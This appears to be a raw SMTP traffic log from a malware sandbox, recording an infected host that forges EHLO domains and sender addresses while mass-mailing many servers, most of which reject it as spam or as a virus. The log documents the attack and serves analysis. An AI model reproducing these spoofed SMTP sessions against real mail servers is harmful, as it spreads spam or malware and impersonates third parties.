Feb 20, 2023 09:50:52.048188925 CET	25	49713	94.100.180.31	192.168.2.5	550 virus message discarded
Feb 20, 2023 09:50:52.049141884 CET	49713	25	192.168.2.5	94.100.180.31	QUIT
Feb 20, 2023 09:50:52.112195969 CET	25	49713	94.100.180.31	192.168.2.5	221 OK, bye
Feb 20, 2023 09:51:26.574506998 CET	25	49717	80.75.42.227	192.168.2.5	220-smx01.a1.net ESMTP (1)
Feb 20, 2023 09:51:27.362147093 CET	25	49719	80.75.42.227	192.168.2.5	220-smx01.a1.net ESMTP (1)
Feb 20, 2023 09:51:29.456075907 CET	25	49718	91.136.8.41	192.168.2.5	220 mail145c50.megamailservers.eu ESMTP Sendmail 8.14.9/8.13.1; Mon, 20 Feb 2023 08:51:27 +0000
Feb 20, 2023 09:51:29.461004972 CET	49718	25	192.168.2.5	91.136.8.41	EHLO telering.at
Feb 20, 2023 09:51:29.549271107 CET	25	49718	91.136.8.41	192.168.2.5	250-mail145c50.megamailservers.eu Hello unn-84-17-52-8.cdn77.com [84.17.52.8] (may be forged), pleased to meet you 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-SIZE 52428800 250-DSN 250-STARTTLS 250-DELIVERBY 250 HELP
Feb 20, 2023 09:51:29.555224895 CET	49718	25	192.168.2.5	91.136.8.41	MAIL FROM:<ppp@a1plus.at>
Feb 20, 2023 09:51:29.900732994 CET	25	49718	91.136.8.41	192.168.2.5	250 2.1.0 <ppp@a1plus.at>... Sender ok
Feb 20, 2023 09:51:29.902410984 CET	49718	25	192.168.2.5	91.136.8.41	RCPT TO:<web@telering.at>
Feb 20, 2023 09:51:29.958970070 CET	25	49718	91.136.8.41	192.168.2.5	550 5.1.1 <web@telering.at>... User unknown
Feb 20, 2023 09:51:32.056163073 CET	25	49717	80.75.42.227	192.168.2.5	521 5.7.1 Service unavailable; client [84.17.52.8] blocked using zen.spamhaus.org
Feb 20, 2023 09:51:33.060818911 CET	25	49719	80.75.42.227	192.168.2.5	521 5.7.1 Service unavailable; client [84.17.52.8] blocked using zen.spamhaus.org
Feb 20, 2023 09:51:33.658761978 CET	25	49721	104.47.0.36	192.168.2.5	220 HE1EUR01FT044.mail.protection.outlook.com Microsoft ESMTP MAIL Service ready at Mon, 20 Feb 2023 08:51:33 +0000
Feb 20, 2023 09:51:33.662868977 CET	49721	25	192.168.2.5	104.47.0.36	EHLO vub.ac.be
Feb 20, 2023 09:51:33.705238104 CET	25	49721	104.47.0.36	192.168.2.5	250-HE1EUR01FT044.mail.protection.outlook.com Hello [84.17.52.8] 250-SIZE 157286400 250-PIPELINING 250-DSN 250-ENHANCEDSTATUSCODES 250-STARTTLS 250-8BITMIME 250-BINARYMIME 250-CHUNKING 250 SMTPUTF8
Feb 20, 2023 09:51:33.711350918 CET	49721	25	192.168.2.5	104.47.0.36	MAIL FROM:<y_z@x.com.pt.>
Feb 20, 2023 09:51:33.753253937 CET	25	49721	104.47.0.36	192.168.2.5	250 2.1.0 Sender OK
Feb 20, 2023 09:51:33.754165888 CET	49721	25	192.168.2.5	104.47.0.36	RCPT TO:<info@vub.ac.be>
Feb 20, 2023 09:51:33.797024012 CET	25	49721	104.47.0.36	192.168.2.5	550 5.7.606 Access denied, banned sending IP [84.17.52.8]. To request removal from this list please visit https://sender.office.com/ and follow the directions. For more information please go to http://go.microsoft.com/fwlink/?LinkID=526655 AS(1430) [HE1EUR01FT044.eop-EUR01.prod.protection.outlook.com 2023-02-20T08:51:33.760Z 08DB1295EC2E43CB]
Feb 20, 2023 09:51:34.013381004 CET	25	49722	104.47.22.161	192.168.2.5	220 DB8EUR06FT032.mail.protection.outlook.com Microsoft ESMTP MAIL Service ready at Mon, 20 Feb 2023 08:51:33 +0000
Feb 20, 2023 09:51:34.021087885 CET	49722	25	192.168.2.5	104.47.22.161	EHLO msn.com
Feb 20, 2023 09:51:34.063779116 CET	25	49722	104.47.22.161	192.168.2.5	250-DB8EUR06FT032.mail.protection.outlook.com Hello [84.17.52.8] 250-SIZE 49283072 250-PIPELINING 250-DSN 250-ENHANCEDSTATUSCODES 250-STARTTLS 250-8BITMIME 250-BINARYMIME 250-CHUNKING 250 SMTPUTF8
Feb 20, 2023 09:51:34.072011948 CET	49722	25	192.168.2.5	104.47.22.161	MAIL FROM:<info123@ektro.cz>
Feb 20, 2023 09:51:34.115331888 CET	25	49722	104.47.22.161	192.168.2.5	550 5.7.1 Service unavailable, Client host [84.17.52.8] blocked using Spamhaus. To request removal from this list see https://www.spamhaus.org/query/ip/84.17.52.8 (AS3130). [DB8EUR06FT032.eop-eur06.prod.protection.outlook.com 2023-02-20T08:51:34.085Z 08DB12B89A6154B4]
Feb 20, 2023 09:51:34.377424002 CET	25	49723	104.47.56.161	192.168.2.5	220 CO1NAM11FT036.mail.protection.outlook.com Microsoft ESMTP MAIL Service ready at Mon, 20 Feb 2023 08:51:33 +0000
Feb 20, 2023 09:51:34.395956993 CET	49723	25	192.168.2.5	104.47.56.161	EHLO msn.com
Feb 20, 2023 09:51:34.564126015 CET	25	49723	104.47.56.161	192.168.2.5	250-CO1NAM11FT036.mail.protection.outlook.com Hello [84.17.52.8] 250-SIZE 49283072 250-PIPELINING 250-DSN 250-ENHANCEDSTATUSCODES 250-STARTTLS 250-8BITMIME 250-BINARYMIME 250-CHUNKING 250 SMTPUTF8
Feb 20, 2023 09:51:34.572721004 CET	49723	25	192.168.2.5	104.47.56.161	MAIL FROM:<matt@litwareinc.com>
Feb 20, 2023 09:51:34.741441965 CET	25	49723	104.47.56.161	192.168.2.5	550 5.7.1 Service unavailable, Client host [84.17.52.8] blocked using Spamhaus. To request removal from this list see https://www.spamhaus.org/query/ip/84.17.52.8 (AS3130). [CO1NAM11FT036.eop-nam11.prod.protection.outlook.com 2023-02-20T08:51:34.647Z 08DB128CBCD25823]
Feb 20, 2023 09:51:34.936278105 CET	25	49724	67.195.228.86	192.168.2.5	220 mtaproxy101.aol.mail.gq1.yahoo.com ESMTP ready
Feb 20, 2023 09:51:34.938730955 CET	49724	25	192.168.2.5	67.195.228.86	EHLO aol.com
Feb 20, 2023 09:51:35.101767063 CET	25	49724	67.195.228.86	192.168.2.5	250-mtaproxy101.aol.mail.gq1.yahoo.com 250-PIPELINING 250-SIZE 41943040 250-8BITMIME 250 STARTTLS
Feb 20, 2023 09:51:35.104974985 CET	49724	25	192.168.2.5	67.195.228.86	MAIL FROM:<fa@animo.br>
Feb 20, 2023 09:51:35.125971079 CET	25	49725	142.250.27.27	192.168.2.5	220 mx.google.com ESMTP a25-20020a50e719000000b004ab4b06a661si2871088edn.397 - gsmtp
Feb 20, 2023 09:51:35.129157066 CET	49725	25	192.168.2.5	142.250.27.27	EHLO xyz.com
Feb 20, 2023 09:51:35.161576986 CET	25	49725	142.250.27.27	192.168.2.5	250-mx.google.com at your service, [84.17.52.8] 250-SIZE 157286400 250-8BITMIME 250-STARTTLS 250-ENHANCEDSTATUSCODES 250-PIPELINING 250-CHUNKING 250 SMTPUTF8
Feb 20, 2023 09:51:35.169476986 CET	49725	25	192.168.2.5	142.250.27.27	MAIL FROM:<web@telering.at>
Feb 20, 2023 09:51:35.200258017 CET	25	49725	142.250.27.27	192.168.2.5	250 2.1.0 OK a25-20020a50e719000000b004ab4b06a661si2871088edn.397 - gsmtp
Feb 20, 2023 09:51:35.277276039 CET	25	49724	67.195.228.86	192.168.2.5	553 5.7.2 [TSS09] All messages from 84.17.52.8 will be permanently deferred; Retrying will NOT succeed. See https://postmaster.yahooinc.com/error-codes
Feb 20, 2023 09:51:35.597049952 CET	49725	25	192.168.2.5	142.250.27.27	RCPT TO:<will_k@xyz.com>
Feb 20, 2023 09:51:35.637880087 CET	25	49725	142.250.27.27	192.168.2.5	550-5.1.1 The email account that you tried to reach does not exist. Please try 550-5.1.1 double-checking the recipient's email address for typos or 550-5.1.1 unnecessary spaces. Learn more at 550 5.1.1 https://support.google.com/mail/?p=NoSuchUser a25-20020a50e719000000b004ab4b06a661si2871088edn.397 - gsmtp
Feb 20, 2023 09:51:36.325037956 CET	25	49727	44.238.161.41	192.168.2.5	220 inbound-trex-1 (trex/6.7.1) ESMTP ready
Feb 20, 2023 09:51:36.334969044 CET	49727	25	192.168.2.5	44.238.161.41	EHLO xyz.com.br
Feb 20, 2023 09:51:36.583745956 CET	25	49727	44.238.161.41	192.168.2.5	250-inbound-trex-1 250-SIZE 40960000 250-8BITMIME 250-SMTPUTF8 250-STARTTLS 250 STARTTLS
Feb 20, 2023 09:51:37.003529072 CET	49727	25	192.168.2.5	44.238.161.41	MAIL FROM:<andreas@contoso.com>
Feb 20, 2023 09:51:37.200748920 CET	25	49727	44.238.161.41	192.168.2.5	250 2.0.0 OK
Feb 20, 2023 09:51:37.229650021 CET	49727	25	192.168.2.5	44.238.161.41	RCPT TO:<an@xyz.com.br>
Feb 20, 2023 09:51:37.504888058 CET	25	49727	44.238.161.41	192.168.2.5	250 2.1.5 Ok
Feb 20, 2023 09:51:37.550198078 CET	49727	25	192.168.2.5	44.238.161.41	DATA
Feb 20, 2023 09:51:37.751765013 CET	25	49727	44.238.161.41	192.168.2.5	354 OK
Feb 20, 2023 09:51:41.057471991 CET	25	49727	44.238.161.41	192.168.2.5	550 5.7.1 [NR] Message rejected
Feb 20, 2023 09:51:41.058681011 CET	49727	25	192.168.2.5	44.238.161.41	QUIT
Feb 20, 2023 09:51:41.252438068 CET	25	49727	44.238.161.41	192.168.2.5	221 2.0.0 Bye
Feb 20, 2023 09:51:42.343807936 CET	25	49736	104.47.57.110	192.168.2.5	220 SN1NAM02FT0039.mail.protection.outlook.com Microsoft ESMTP MAIL Service ready at Mon, 20 Feb 2023 08:51:42 +0000
Feb 20, 2023 09:51:42.348028898 CET	49736	25	192.168.2.5	104.47.57.110	EHLO contoso.com
Feb 20, 2023 09:51:42.478874922 CET	25	49736	104.47.57.110	192.168.2.5	250-SN1NAM02FT0039.mail.protection.outlook.com Hello [84.17.52.8] 250-SIZE 157286400 250-PIPELINING 250-DSN 250-ENHANCEDSTATUSCODES 250-STARTTLS 250-8BITMIME 250-BINARYMIME 250-CHUNKING 250 SMTPUTF8
Feb 20, 2023 09:51:42.510844946 CET	49736	25	192.168.2.5	104.47.57.110	MAIL FROM:<hana_99@lufka.zx>
Feb 20, 2023 09:51:42.642715931 CET	25	49736	104.47.57.110	192.168.2.5	250 2.1.0 Sender OK
Feb 20, 2023 09:51:42.644954920 CET	49736	25	192.168.2.5	104.47.57.110	RCPT TO:<guy@contoso.com>
Feb 20, 2023 09:51:42.776335001 CET	25	49736	104.47.57.110	192.168.2.5	550 5.7.606 Access denied, banned sending IP [84.17.52.8]. To request removal from this list please visit https://sender.office.com/ and follow the directions. For more information please go to http://go.microsoft.com/fwlink/?LinkID=526655 AS(1430) [SN1NAM02FT0039.eop-nam02.prod.protection.outlook.com 2023-02-20T08:51:42.700Z 08DB127FC6E12A6D]
Feb 20, 2023 09:51:43.531063080 CET	25	49742	142.250.27.26	192.168.2.5	220 mx.google.com ESMTP u3-20020a056402064300b004abd2054781si3206565edx.92 - gsmtp
Feb 20, 2023 09:51:43.534295082 CET	49742	25	192.168.2.5	142.250.27.26	EHLO contoso.es
Feb 20, 2023 09:51:43.565829039 CET	25	49742	142.250.27.26	192.168.2.5	250-mx.google.com at your service, [84.17.52.8] 250-SIZE 157286400 250-8BITMIME 250-STARTTLS 250-ENHANCEDSTATUSCODES 250-PIPELINING 250-CHUNKING 250 SMTPUTF8
Feb 20, 2023 09:51:43.572882891 CET	49742	25	192.168.2.5	142.250.27.26	MAIL FROM:<universidad@example.mx>
Feb 20, 2023 09:51:43.602392912 CET	25	49742	142.250.27.26	192.168.2.5	250 2.1.0 OK u3-20020a056402064300b004abd2054781si3206565edx.92 - gsmtp
Feb 20, 2023 09:51:43.605799913 CET	49742	25	192.168.2.5	142.250.27.26	RCPT TO:<artes@contoso.es>
Feb 20, 2023 09:51:43.643843889 CET	25	49742	142.250.27.26	192.168.2.5	550-5.1.1 The email account that you tried to reach does not exist. Please try 550-5.1.1 double-checking the recipient's email address for typos or 550-5.1.1 unnecessary spaces. Learn more at 550 5.1.1 https://support.google.com/mail/?p=NoSuchUser u3-20020a056402064300b004abd2054781si3206565edx.92 - gsmtp
Feb 20, 2023 09:51:46.264519930 CET	25	49750	104.47.57.110	192.168.2.5	220 SN1NAM02FT0046.mail.protection.outlook.com Microsoft ESMTP MAIL Service ready at Mon, 20 Feb 2023 08:51:45 +0000
Feb 20, 2023 09:51:46.268250942 CET	49750	25	192.168.2.5	104.47.57.110	EHLO contoso.com
Feb 20, 2023 09:51:46.408895969 CET	25	49750	104.47.57.110	192.168.2.5	250-SN1NAM02FT0046.mail.protection.outlook.com Hello [84.17.52.8] 250-SIZE 157286400 250-PIPELINING 250-DSN 250-ENHANCEDSTATUSCODES 250-STARTTLS 250-8BITMIME 250-BINARYMIME 250-CHUNKING 250 SMTPUTF8
Feb 20, 2023 09:51:46.416143894 CET	49750	25	192.168.2.5	104.47.57.110	MAIL FROM:<ruy@contoso.com.pt.>
Feb 20, 2023 09:51:46.557121992 CET	25	49750	104.47.57.110	192.168.2.5	250 2.1.0 Sender OK
Feb 20, 2023 09:51:46.595773935 CET	49750	25	192.168.2.5	104.47.57.110	RCPT TO:<andreas@contoso.com>
Feb 20, 2023 09:51:46.737107038 CET	25	49750	104.47.57.110	192.168.2.5	550 5.7.606 Access denied, banned sending IP [84.17.52.8]. To request removal from this list please visit https://sender.office.com/ and follow the directions. For more information please go to http://go.microsoft.com/fwlink/?LinkID=526655 AS(1430) [SN1NAM02FT0046.eop-nam02.prod.protection.outlook.com 2023-02-20T08:51:46.652Z 08DB1300D6F4F94D]
Feb 20, 2023 09:51:47.250849962 CET	25	49745	165.227.159.144	192.168.2.5	220 mail.h-email.net ESMTP
Feb 20, 2023 09:51:47.262778044 CET	49745	25	192.168.2.5	165.227.159.144	EHLO example.es
Feb 20, 2023 09:51:47.671082973 CET	25	49745	165.227.159.144	192.168.2.5	250-Welcome 250-8BITMIME 250-ETRN 250-SMTPUTF8 250-PIPELINING 250-SIZE 1048576 250-DSN 250-REQUIRETLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-STARTTLS 250 HELP
Feb 20, 2023 09:51:47.677561998 CET	49745	25	192.168.2.5	165.227.159.144	MAIL FROM:<namdv@fb.cz>
Feb 20, 2023 09:51:47.894862890 CET	25	49745	165.227.159.144	192.168.2.5	250 Ok
Feb 20, 2023 09:51:47.898283958 CET	49745	25	192.168.2.5	165.227.159.144	RCPT TO:<universidad@example.es>
Feb 20, 2023 09:51:48.085091114 CET	25	49745	165.227.159.144	192.168.2.5	250 Ok
Feb 20, 2023 09:51:48.107474089 CET	49745	25	192.168.2.5	165.227.159.144	DATA
Feb 20, 2023 09:51:48.301218987 CET	25	49745	165.227.159.144	192.168.2.5	354 Proceed
Feb 20, 2023 09:51:52.597459078 CET	49745	25	192.168.2.5	165.227.159.144	QUIT
Feb 20, 2023 09:51:55.429476023 CET	25	49761	195.29.173.138	192.168.2.5	554-ma-01.vlada.hr 554 Your access to this mail system has been rejected due to the sending MTA's poor reputation. If you believe that this failure is in error, please contact the intended recipient via alternate means.
Feb 20, 2023 09:51:57.152312994 CET	25	49763	178.218.165.214	192.168.2.5	220-argon.studio4web.com ESMTP Exim 4.96 #2 Mon, 20 Feb 2023 09:51:57 +0100 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Feb 20, 2023 09:51:58.121822119 CET	49763	25	192.168.2.5	178.218.165.214	EHLO dva.hr
Feb 20, 2023 09:51:58.156696081 CET	25	49763	178.218.165.214	192.168.2.5	250-argon.studio4web.com Hello dva.hr [84.17.52.8] 250-SIZE 157286400 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Feb 20, 2023 09:51:58.211358070 CET	49763	25	192.168.2.5	178.218.165.214	MAIL FROM:<joeyadams3.14159@gmail.com>
Feb 20, 2023 09:51:58.246293068 CET	25	49763	178.218.165.214	192.168.2.5	250 OK
Feb 20, 2023 09:51:58.360445976 CET	49763	25	192.168.2.5	178.218.165.214	RCPT TO:<jedan@dva.hr>
Feb 20, 2023 09:51:58.408548117 CET	25	49763	178.218.165.214	192.168.2.5	550 No Such User Here
Feb 20, 2023 09:51:58.497208118 CET	25	49763	178.218.165.214	192.168.2.5	421 argon.studio4web.com lost input connection
Feb 20, 2023 09:51:59.565526962 CET	25	49765	142.250.27.27	192.168.2.5	220 mx.google.com ESMTP fc24-20020a1709073a5800b0088ed7edb2a7si13002227ejc.439 - gsmtp
Feb 20, 2023 09:51:59.567955017 CET	49765	25	192.168.2.5	142.250.27.27	EHLO fb.cz
Feb 20, 2023 09:51:59.602076054 CET	25	49765	142.250.27.27	192.168.2.5	250-mx.google.com at your service, [84.17.52.8] 250-SIZE 157286400 250-8BITMIME 250-STARTTLS 250-ENHANCEDSTATUSCODES 250-PIPELINING 250-CHUNKING 250 SMTPUTF8
Feb 20, 2023 09:51:59.607323885 CET	49765	25	192.168.2.5	142.250.27.27	MAIL FROM:<y_z@x.com.pt.>
Feb 20, 2023 09:51:59.638710022 CET	25	49765	142.250.27.27	192.168.2.5	553 5.1.7 The sender address <y_z@x.com.pt.> is not a valid RFC-5321 address. fc24-20020a1709073a5800b0088ed7edb2a7si13002227ejc.439 - gsmtp
Feb 20, 2023 09:52:00.643794060 CET	25	49766	104.47.57.110	192.168.2.5	220 SN1NAM02FT0005.mail.protection.outlook.com Microsoft ESMTP MAIL Service ready at Mon, 20 Feb 2023 08:51:59 +0000
Feb 20, 2023 09:52:00.964544058 CET	49766	25	192.168.2.5	104.47.57.110	EHLO abc.org
Feb 20, 2023 09:52:01.100656986 CET	25	49766	104.47.57.110	192.168.2.5	250-SN1NAM02FT0005.mail.protection.outlook.com Hello [84.17.52.8] 250-SIZE 157286400 250-PIPELINING 250-DSN 250-ENHANCEDSTATUSCODES 250-STARTTLS 250-8BITMIME 250-BINARYMIME 250-CHUNKING 250 SMTPUTF8
Feb 20, 2023 09:52:01.387502909 CET	49766	25	192.168.2.5	104.47.57.110	MAIL FROM:<pedro_xy@contoso.com.br.>
Feb 20, 2023 09:52:01.524046898 CET	25	49766	104.47.57.110	192.168.2.5	250 2.1.0 Sender OK
Feb 20, 2023 09:52:01.545067072 CET	49766	25	192.168.2.5	104.47.57.110	RCPT TO:<john.smith@abc.org>
Feb 20, 2023 09:52:01.682831049 CET	25	49766	104.47.57.110	192.168.2.5	550 5.7.606 Access denied, banned sending IP [84.17.52.8]. To request removal from this list please visit https://sender.office.com/ and follow the directions. For more information please go to http://go.microsoft.com/fwlink/?LinkID=526655 AS(1430) [SN1NAM02FT0005.eop-nam02.prod.protection.outlook.com 2023-02-20T08:52:01.602Z 08DB13129DF84007]
Feb 20, 2023 09:52:02.586872101 CET	25	49767	212.19.106.223	192.168.2.5	220-zmta.leonet.it ESMTP Postfix
Feb 20, 2023 09:52:03.571294069 CET	25	49768	40.93.212.0	192.168.2.5	220 CD1PEPF000006AF.mail.protection.outlook.com Microsoft ESMTP MAIL Service ready at Mon, 20 Feb 2023 08:52:02 +0000
Feb 20, 2023 09:52:03.575547934 CET	49768	25	192.168.2.5	40.93.212.0	EHLO microsoft.com
Feb 20, 2023 09:52:03.711461067 CET	25	49768	40.93.212.0	192.168.2.5	250-CD1PEPF000006AF.mail.protection.outlook.com Hello [84.17.52.8] 250-SIZE 157286400 250-PIPELINING 250-DSN 250-ENHANCEDSTATUSCODES 250-STARTTLS 250-8BITMIME 250-BINARYMIME 250-CHUNKING 250 SMTPUTF8
Feb 20, 2023 09:52:03.719022989 CET	49768	25	192.168.2.5	40.93.212.0	MAIL FROM:<freetype@nongnu.org>
Feb 20, 2023 09:52:03.854590893 CET	25	49768	40.93.212.0	192.168.2.5	250 2.1.0 Sender OK
Feb 20, 2023 09:52:03.863823891 CET	49768	25	192.168.2.5	40.93.212.0	RCPT TO:<v3dops@microsoft.com>
Feb 20, 2023 09:52:04.000076056 CET	25	49768	40.93.212.0	192.168.2.5	550 5.7.606 Access denied, banned sending IP [84.17.52.8]. To request removal from this list please visit https://sender.office.com/ and follow the directions. For more information please go to http://go.microsoft.com/fwlink/?LinkID=526655 AS(1430) [CD1PEPF000006AF.namprd00.prod.outlook.com 2023-02-20T08:52:03.916Z 08DB0FD8725DC451]
Feb 20, 2023 09:52:04.614236116 CET	25	49770	159.253.31.95	192.168.2.5	220 silly.haxx.se ESMTP Postfix (Debian/GNU)
Feb 20, 2023 09:52:04.616226912 CET	49770	25	192.168.2.5	159.253.31.95	EHLO haxx.se
Feb 20, 2023 09:52:04.651221037 CET	25	49770	159.253.31.95	192.168.2.5	250-silly.haxx.se 250-PIPELINING 250-SIZE 15240000 250-ETRN 250-STARTTLS 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250-SMTPUTF8 250 CHUNKING
Feb 20, 2023 09:52:04.656954050 CET	49770	25	192.168.2.5	159.253.31.95	MAIL FROM:<z_y@quatro.br>
Feb 20, 2023 09:52:04.692425013 CET	25	49770	159.253.31.95	192.168.2.5	250 2.1.0 Ok
Feb 20, 2023 09:52:04.694546938 CET	49770	25	192.168.2.5	159.253.31.95	RCPT TO:<daniel@haxx.se>
Feb 20, 2023 09:52:04.741333008 CET	25	49770	159.253.31.95	192.168.2.5	550 5.7.23 <daniel@haxx.se>: Recipient address rejected: Message rejected due to: SPF fail - not authorized. Please see http://www.openspf.net/Why?s=helo;id=haxx.se;ip=84.17.52.8;r=<UNKNOWN>
Feb 20, 2023 09:52:05.525007963 CET	25	49773	104.47.73.10	192.168.2.5	220 DM6NAM04FT022.mail.protection.outlook.com Microsoft ESMTP MAIL Service ready at Mon, 20 Feb 2023 08:52:04 +0000
Feb 20, 2023 09:52:05.528167009 CET	49773	25	192.168.2.5	104.47.73.10	EHLO adobe.com
Feb 20, 2023 09:52:05.659610987 CET	25	49773	104.47.73.10	192.168.2.5	250-DM6NAM04FT022.mail.protection.outlook.com Hello [84.17.52.8] 250-SIZE 157286400 250-PIPELINING 250-DSN 250-ENHANCEDSTATUSCODES 250-STARTTLS 250-8BITMIME 250-BINARYMIME 250-CHUNKING 250 SMTPUTF8
Feb 20, 2023 09:52:05.673686028 CET	49773	25	192.168.2.5	104.47.73.10	MAIL FROM:<c-tsai4@uiuc.edu>
Feb 20, 2023 09:52:05.805490017 CET	25	49773	104.47.73.10	192.168.2.5	250 2.1.0 Sender OK
Feb 20, 2023 09:52:05.806370974 CET	49773	25	192.168.2.5	104.47.73.10	RCPT TO:<acom_vip@adobe.com>
Feb 20, 2023 09:52:05.938930988 CET	25	49773	104.47.73.10	192.168.2.5	550 5.7.606 Access denied, banned sending IP [84.17.52.8]. To request removal from this list please visit https://sender.office.com/ and follow the directions. For more information please go to http://go.microsoft.com/fwlink/?LinkID=526655 AS(1430) [DM6NAM04FT022.eop-NAM04.prod.protection.outlook.com 2023-02-20T08:52:05.855Z 08DB128FDA97CDA8]
Feb 20, 2023 09:52:08.201010942 CET	25	49767	212.19.106.223	192.168.2.5	220 zmta.leonet.it ESMTP Postfix
Feb 20, 2023 09:52:08.202861071 CET	49767	25	192.168.2.5	212.19.106.223	EHLO orice.com
Feb 20, 2023 09:52:08.242171049 CET	25	49767	212.19.106.223	192.168.2.5	250-zmta.leonet.it 250-PIPELINING 250-SIZE 51200000 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Feb 20, 2023 09:52:08.251960993 CET	49767	25	192.168.2.5	212.19.106.223	MAIL FROM:<lastguru@mail.ru>
Feb 20, 2023 09:52:08.294776917 CET	25	49767	212.19.106.223	192.168.2.5	250 2.1.0 Ok
Feb 20, 2023 09:52:08.296514034 CET	49767	25	192.168.2.5	212.19.106.223	RCPT TO:<cineva@orice.com>
Feb 20, 2023 09:52:08.342483044 CET	25	49767	212.19.106.223	192.168.2.5	550 5.1.1 <cineva@orice.com>: Recipient address rejected: orice.com
Feb 20, 2023 09:52:09.620240927 CET	25	49780	104.47.11.202	192.168.2.5	220 AM0EUR02FT037.mail.protection.outlook.com Microsoft ESMTP MAIL Service ready at Mon, 20 Feb 2023 08:52:08 +0000
Feb 20, 2023 09:52:09.672214985 CET	49780	25	192.168.2.5	104.47.11.202	EHLO autoitscript.com
Feb 20, 2023 09:52:09.701498985 CET	25	49780	104.47.11.202	192.168.2.5	250-AM0EUR02FT037.mail.protection.outlook.com Hello [84.17.52.8] 250-SIZE 157286400 250-PIPELINING 250-DSN 250-ENHANCEDSTATUSCODES 250-STARTTLS 250-8BITMIME 250-BINARYMIME 250-CHUNKING 250 SMTPUTF8
Feb 20, 2023 09:52:09.777894974 CET	25	49779	40.93.212.0	192.168.2.5	220 CD1PEPF000006AE.mail.protection.outlook.com Microsoft ESMTP MAIL Service ready at Mon, 20 Feb 2023 08:52:09 +0000
Feb 20, 2023 09:52:09.821065903 CET	49780	25	192.168.2.5	104.47.11.202	MAIL FROM:<an@xyz.com.br>
Feb 20, 2023 09:52:09.830564022 CET	49779	25	192.168.2.5	40.93.212.0	EHLO microsoft.com
Feb 20, 2023 09:52:09.849040031 CET	25	49780	104.47.11.202	192.168.2.5	250 2.1.0 Sender OK
Feb 20, 2023 09:52:09.849822998 CET	49780	25	192.168.2.5	104.47.11.202	RCPT TO:<support@autoitscript.com>
Feb 20, 2023 09:52:09.877912998 CET	25	49780	104.47.11.202	192.168.2.5	550 5.7.606 Access denied, banned sending IP [84.17.52.8]. To request removal from this list please visit https://sender.office.com/ and follow the directions. For more information please go to http://go.microsoft.com/fwlink/?LinkID=526655 AS(1430) [AM0EUR02FT037.eop-EUR02.prod.protection.outlook.com 2023-02-20T08:52:09.853Z 08DB126DA5B0ECCA]
Feb 20, 2023 09:52:09.965682030 CET	25	49779	40.93.212.0	192.168.2.5	250-CD1PEPF000006AE.mail.protection.outlook.com Hello [84.17.52.8] 250-SIZE 157286400 250-PIPELINING 250-DSN 250-ENHANCEDSTATUSCODES 250-STARTTLS 250-8BITMIME 250-BINARYMIME 250-CHUNKING 250 SMTPUTF8
Feb 20, 2023 09:52:09.971389055 CET	49779	25	192.168.2.5	40.93.212.0	MAIL FROM:<acom_vip@adobe.com>
Feb 20, 2023 09:52:10.106993914 CET	25	49779	40.93.212.0	192.168.2.5	250 2.1.0 Sender OK
Feb 20, 2023 09:52:10.107958078 CET	49779	25	192.168.2.5	40.93.212.0	RCPT TO:<cpxlate@microsoft.com>
Feb 20, 2023 09:52:10.243827105 CET	25	49779	40.93.212.0	192.168.2.5	550 5.7.606 Access denied, banned sending IP [84.17.52.8]. To request removal from this list please visit https://sender.office.com/ and follow the directions. For more information please go to http://go.microsoft.com/fwlink/?LinkID=526655 AS(1430) [CD1PEPF000006AE.namprd00.prod.outlook.com 2023-02-20T08:52:10.157Z 08DB0FD5D3808A44]
Feb 20, 2023 09:52:10.540574074 CET	25	49782	64.147.108.52	192.168.2.5	220 pb-mx11.pobox.com ESMTP Postfix
Feb 20, 2023 09:52:10.541691065 CET	25	49779	40.93.212.0	192.168.2.5	550 5.7.606 Access denied, banned sending IP [84.17.52.8]. To request removal from this list please visit https://sender.office.com/ and follow the directions. For more information please go to http://go.microsoft.com/fwlink/?LinkID=526655 AS(1430) [CD1PEPF000006AE.namprd00.prod.outlook.com 2023-02-20T08:52:10.157Z 08DB0FD5D3808A44]
Feb 20, 2023 09:52:10.858510017 CET	49782	25	192.168.2.5	64.147.108.52	EHLO pobox.com
Feb 20, 2023 09:52:10.958369017 CET	25	49782	64.147.108.52	192.168.2.5	250-pb-mx11.pobox.com 250-PIPELINING 250-SIZE 36700160 250-ETRN 250-STARTTLS 250-ENHANCEDSTATUSCODES 250 8BITMIME
Feb 20, 2023 09:52:10.961698055 CET	49782	25	192.168.2.5	64.147.108.52	MAIL FROM:<zpravy2@arb.cz.>
Feb 20, 2023 09:52:11.062376976 CET	25	49782	64.147.108.52	192.168.2.5	250 2.1.0 Ok
Feb 20, 2023 09:52:11.063812971 CET	49782	25	192.168.2.5	64.147.108.52	RCPT TO:<biljir@pobox.com>
Feb 20, 2023 09:52:11.578845978 CET	25	49782	64.147.108.52	192.168.2.5	554 5.7.1 <biljir@pobox.com>: Recipient address rejected: dnsbl/zen.spamhaus.org returned deny: for 84.17.52.8 (unknown)
Feb 20, 2023 09:52:13.303653955 CET	25	49785	185.132.181.97	192.168.2.5	220 mx07-00377f01.pphosted.com ESMTP mfa-m0169136
Feb 20, 2023 09:52:13.305145025 CET	49785	25	192.168.2.5	185.132.181.97	EHLO northcoast.com
Feb 20, 2023 09:52:13.332638979 CET	25	49785	185.132.181.97	192.168.2.5	250-mx07-00377f01.pphosted.com Hello unn-84-17-52-8.cdn77.com [84.17.52.8] (may be forged), pleased to meet you 250-ENHANCEDSTATUSCODES 250-PIPELINING 250-8BITMIME 250 STARTTLS
Feb 20, 2023 09:52:13.337990046 CET	49785	25	192.168.2.5	185.132.181.97	MAIL FROM:<xixuy@example.com>
Feb 20, 2023 09:52:13.367948055 CET	25	49785	185.132.181.97	192.168.2.5	250 2.1.0 Sender ok
Feb 20, 2023 09:52:13.378192902 CET	49785	25	192.168.2.5	185.132.181.97	RCPT TO:<grady@northcoast.com>
Feb 20, 2023 09:52:13.415265083 CET	25	49785	185.132.181.97	192.168.2.5	250 2.1.5 Recipient ok
